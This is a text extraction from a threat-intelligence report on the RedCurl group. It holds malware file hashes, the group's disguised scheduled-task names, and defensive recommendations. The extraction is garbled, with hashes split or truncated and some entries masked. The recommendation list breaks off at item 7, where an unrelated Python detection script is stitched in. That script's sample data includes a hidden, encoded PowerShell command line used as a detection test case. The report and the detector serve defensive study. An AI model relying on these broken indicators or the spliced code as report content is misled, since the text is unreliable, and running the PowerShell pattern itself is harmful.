SHA256: 15417751a35972f2e54123e97440a8acf24c26bbd9d8521cc88fb7498
b54b567
Encrypted
RedCurl.C1
MD5: e000ab9fa0bf5e01ba353bba14fac8f1
SHA1: 51d60a7da40c11e37b31462e6b78f909e84d85f4
SHA256: 22d9328d4e9da55db54576ab52eb6837c20bf034e045e5f078b00e7

Encrypted
RedCurl.C2
 MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: 12ec7e6876dc86f158f448ebfba9e0eb
SHA1: 464a8c086279357ad41e15180ae0d4881cf48717
SHA256: 5388a22c42c360937e422df0f4336c48003fbf72aa87bb1f4107de900
59dc04d
RedCurl.Dropper
46
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
  
 MD5: 65167ef2ac035b8205e657a31b3c8ee5
SHA1: aa21dc970461c653bd24e75a1440f6893bbaf747
SHA256: df621643336947405b6f0d66927730a51267c39b6978ac732f9dc7941
7fba464
Encrypted
RedCurl.FSA
MD5: cda007d68777e193827ab87cb00c4726
SHA1: 25a3d8aacc4bb40fd3a42ab7fa80c180324ac90b
SHA256: 7476fe7f7750f5fcc2eeb66b3626377957f0a1e92d621cb4db2352b659
5722c7
Encrypted
RedCurl.C1
MD5: 12ec7e6876dc86f158f448ebfba9e0eb
SHA1: 464a8c086279357ad41e15180ae0d4881cf48717
SHA256: 5388a22c42c360937e422df0f4336c48003fbf72aa87bb1f4107de900
59dc04d
Encrypted
RedCurl.C2
 MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********

SHA1: 8fc49c58aeb70943da579e6985b64d78a56f6958
SHA256: 61f981e15bae9b0643262f16a124cb490f51d0040267d41e17c6b83f2b9
d437c
RedCurl.Dropper
MD5: 4071bf66e07cd4a7feadd316f91cfd56
SHA1: b9c762e7e65b4cdcac054fa424b2219f8ecf3b78
SHA256: edfa39f931ec45f71a4b6cc6b473f046a384f1f05637a1eb0a5a4c1608c
044cf
Encrypted
RedCurl.FSA
MD5: db602ed8ba5890f162dc3546847646b1
SHA1: 7fee558c6d6668e67e75dd94a2d7609c287ec756

556d7
Encrypted
RedCurl.C1
MD5: f04cf464ddd719dce94640cc4b6e866d
SHA1: 19d0afc92e3e98e3ed5e1db9aed21da791245e8d
SHA256: 660f8efbf3f5e408092ead5933bcb80bd220d91d3233ec162ebf725fd
0bc82f6
Encrypted
RedCurl.C2
 MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********
 MD5: 979eaebd1510996ab834e3471fdaab5b
SHA1: 23e813e43dc67b50a7d00f76223c1fc56fe1abbe
SHA256: bba4e8a3f2a05d5bb543b765c7964e33ba02e8a895bfc64976f6ae9
412a99464
RedCurl.Dropper
47
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
  

SHA1: b1a79cce4a75e46830f52fedc67b2a3209eb78bb

87da4
Encrypted
RedCurl.FSA
MD5: b5d0f72dc1bda1727d88c51cf16ee8c1

SHA256: cf2b96927b6f3bf3bb169200e047b6337a256012f350b6f5b5b8bec37
100f951
Encrypted
RedCurl.C1
MD5: 662493e155284d654d61e2923efeeec4
SHA1: 09bd864389edcc7585a42950e32619c31b1ac34a
SHA256: 2c69410c0d45561d286b67f7848811b551dd659d62fef7cb1711875d3c1c
0a3a
Encrypted
RedCurl.C2
MD5: **********
SHA1: **********
SHA256: **********
**********
MD5: **********
SHA1: **********
SHA256: **********
**********

 
 




 

 
 


 


 


48
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
 
 


 


 


 


 


 


 


 


 


 


 


 


 


49
© GROUP−IB
IOCS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
 
 








 


 


 


 


 



 
Microsoft Windows Check Updates Status
CheckTN1
CheckU3
CheckTN1
DiskDiagnosticResolverSrv
NetworkStateChangeTaskProv
ControlLocalTimeSvc
CleanupTemporaryStateTask
WsSwapAssessmentTask
SynaMonAppService
NetworkStateChangeTaskProv
CalibrationLoaderTask
CalibrationLoaderTask
MsCtfMonitorFramework
Base64(%USERNAME%)
SysprepGeneralizeDrivers_ + Base64(%USERNAME%)
RegisterDeviceSettingsChange_ + Base64(%USERNAME%)
Base64(%USERNAME%)
Microsoft-Windows-DiskDiagnosticDataCollector_ + Base64(%USERNAME%)
MicrosoftSharePointProducts_ + Base64(%USERNAME%)
ProcessMemoryDiagnosticEvents_ + Base64(%USERNAME%)
Scheduled_ + Base64(%USERNAME%)
BitLockerMDMpolicyRefresh_ + Base64(%USERNAME%)
SvcRestartTaskNetworkService
NetworkStateChangeTask_ + Base64(%USERNAME%)
MDMMaintenenceTask_ + Base64(%USERNAME%)
Registration_ + Base64(%USERNAME%)
SpaceManagerService_ + Base64(%USERNAME%)
Base64(%USERNAME%)
MusUx_UpdateInterval_ + Base64(%USERNAME%)
MsCtfMonitor_ + Base64(%USERNAME%)
RegIdleBackup_ + Base64(%USERNAME%)
WindowsActionDialog_ + Base64(%USERNAME%)
RMSRightsPolicyTemplateManagement_ + Base64(%USERNAME%)
MDMMaintenenceTask_ + Base64(%USERNAME%)

Appendix 2. Examples of FSA, C1, and C2

Recommendations
Each analytical report issued by Group-IB’s Threat Intelligence & Attribution team contains recommendations on how to prevent attacks conducted by the group(s) analyzed. In this case, Group-IB experts recommend taking the following steps:
1. Analyze phishing emails detected by security tools and users.
2. Monitor applications (including command line arguments) that are often used by cybercriminals during initial compromise
3. Restrict PowerShell execution on systems where it is unnecessary. Monitor executable scripts and pay close attention to powershell.exe processes with long Base64-encoded strings in arguments.
4. Monitor arguments with which rundll32.exe is launched.
5. Monitor and verify tasks created in the scheduler.
6. Block access to cloud storage devices that are unnecessary.
7.
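As an added example (not code from the report), a small Python checker for recommendations 3 to 5 run over constructed sample records: it flags powershell.exe launched with an encoded-command switch or a long Base64 run in its arguments, every rundll32.exe launch, and scheduled tasks whose name is in the report's list or ends in a Base64-encoded username, the naming pattern shown in the IOC appendix. The record format, the sample command lines and the username "j.doe" are assumptions made for the example.

```python
import base64
import re
from typing import List, Optional

# A subset of the scheduled task names and name prefixes listed in the report's
# IOC appendix; the prefixed names are completed with Base64(%USERNAME%).
KNOWN_TASK_NAMES = {
    "CheckTN1", "CheckU3", "DiskDiagnosticResolverSrv", "ControlLocalTimeSvc",
    "NetworkStateChangeTaskProv", "MsCtfMonitorFramework", "SynaMonAppService",
}
KNOWN_TASK_PREFIXES = {
    "SysprepGeneralizeDrivers_", "RegisterDeviceSettingsChange_", "Scheduled_",
    "BitLockerMDMpolicyRefresh_", "MDMMaintenenceTask_", "MusUx_UpdateInterval_",
    "MsCtfMonitor_", "RegIdleBackup_", "RMSRightsPolicyTemplateManagement_",
}
# Encoded-command switch (-e/-ec/-enc/-EncodedCommand) or a long Base64 run.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\b")
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")

# Constructed sample records (not from the report) in a simplified
# 'Image=<path>|CommandLine=<args>' format; the Base64 blob is filler, not a command.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell.exe -nop -w hidden -enc " + "QQBB" * 40,
    "Image=C:\\Windows\\System32\\rundll32.exe"
    "|CommandLine=rundll32.exe C:\\Users\\Public\\sample.dll,Entry",
    "Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe report.txt",
]
SAMPLE_TASKS = [
    "SysprepGeneralizeDrivers_" + base64.b64encode(b"j.doe").decode("ascii"),
    "MsCtfMonitorFramework",
    "Microsoft Compatibility Appraiser",  # a legitimate built-in task, for contrast
]

def flag_process_event(line: str) -> List[str]:
    """Recommendations 3 and 4: encoded PowerShell and every rundll32 launch."""
    image_part, cmd = line.split("|CommandLine=", 1)
    image = image_part.rsplit("\\", 1)[-1].lower()
    findings = []
    if image == "powershell.exe" and (ENC_FLAG.search(cmd) or BASE64_RUN.search(cmd)):
        findings.append("powershell_long_base64")
    if image == "rundll32.exe":
        findings.append("rundll32_launch")
    return findings

def decode_username_suffix(task_name: str) -> Optional[str]:
    """Return the decoded suffix of '<prefix>_<Base64>' when it is printable ASCII
    (the shape of Base64(%USERNAME%)); otherwise None."""
    _, sep, suffix = task_name.rpartition("_")
    if not sep or not suffix:
        return None
    try:
        raw = base64.b64decode(suffix, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("ascii") if raw and all(32 <= b < 127 for b in raw) else None

def flag_task(task_name: str) -> List[str]:
    """Recommendation 5: match a scheduler entry against the report's task names."""
    findings = []
    if task_name in KNOWN_TASK_NAMES:
        findings.append("known_redcurl_task_name")
    if task_name.rpartition("_")[0] + "_" in KNOWN_TASK_PREFIXES:
        findings.append("known_redcurl_prefix")
    if decode_username_suffix(task_name) is not None:
        findings.append("base64_username_suffix")
    return findings
```

The Base64-suffix check is a heuristic: a legitimate task whose last "_" segment happens to decode to printable ASCII will also be flagged, so treat it as a triage hint rather than a verdict.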

Group-IB Threat Intelligence and Research Centers: Europe, Russia, Middle East (Amsterdam, Moscow, Dubai, Singapore)

Group-IB is a global leader in high-fidelity Threat Hunting and Intelligence, best-in-class fraud prevention solutions, and high-profile cyber investigations.
Globally distributed cybercrime monitoring infrastructure
Digital Forensics & Malware Analysis Laboratory
High-Tech Crime Investigations
CERT-GIB: 24/7 monitoring centers and Computer Emergency Response Team
INTERPOL and Europol: partner and active collaborator in global investigations
OSCE: recommended by the OSCE as a cybersecurity solutions provider
APAC Top 10: ranked among the Top 10 cybersecurity companies in the APAC region according to APAC CIO Outlook

Group-IB’s technologies and innovations
Group-IB’s experience in performing successful global investigations with state-of-the-art threat intelligence and detecting cybercriminals at every stage of attack preparation has been fused into an ecosystem of highly sophisticated software and hardware solutions designed to monitor, identify, and prevent cyber threats. Our mission is to protect our clients in cyberspace at all costs using innovative technologies and services.
Threat Intelligence & Attribution: System for analyzing and attributing cyberattacks, threat hunting, and protecting network infrastructure based on data relating to adversary tactics, tools, and activity
Fraud Hunting Platform: Client-side digital identity protection and fraud prevention in real time
Threat Hunting Framework: Adversary-centric detection of targeted attacks and unknown threats for IT and OT environments
Atmosphere: Cloud Email Protection: Patented email security technology that blocks, detonates and hunts for the most advanced email threats
Digital Risk Protection: AI-driven platform for digital risk
Group-IB’s technologies are recognized by the world’s leading research companies: Forrester, Frost & Sullivan, IDC, Gartner, KuppingerCole Analysts AG.

Intelligence-driven services
Group-IB’s technological leadership and R&D capabilities are built on the company’s 18 years of hands-on experience in performing successful cybercrime investigations worldwide and the 70,000 hours of cybersecurity incident response accumulated in our leading forensic laboratory and CERT-GIB.
High-tech crimes; Data leaks; Sophisticated attacks against critical infrastructure
Penetration Testing; Source code analysis; Compromise Assessment; Red Teaming engagements; Incident Response Readiness Assessment; Compliance Auditing
Incident Response; Malware analysis; Threat Hunting and more
Digital hygiene; Personal cybersecurity; Reputation management and more
CERT-GIB: 24/7 incident response center; Proactive threat hunting; On-prem incident response for complex attacks; Investigation subscription
550+ world-class experts; 70,000+ hours of incident response; 1,300+ successful investigations worldwide; 18 years of practical experience

www.group-ib.com
group-ib.com/blog/
info@group-ib.com
+65 31 59 37 98
twitter.com/groupib_gib
PREVENTING AND INVESTIGATING CYBERCRIME SINCE 2003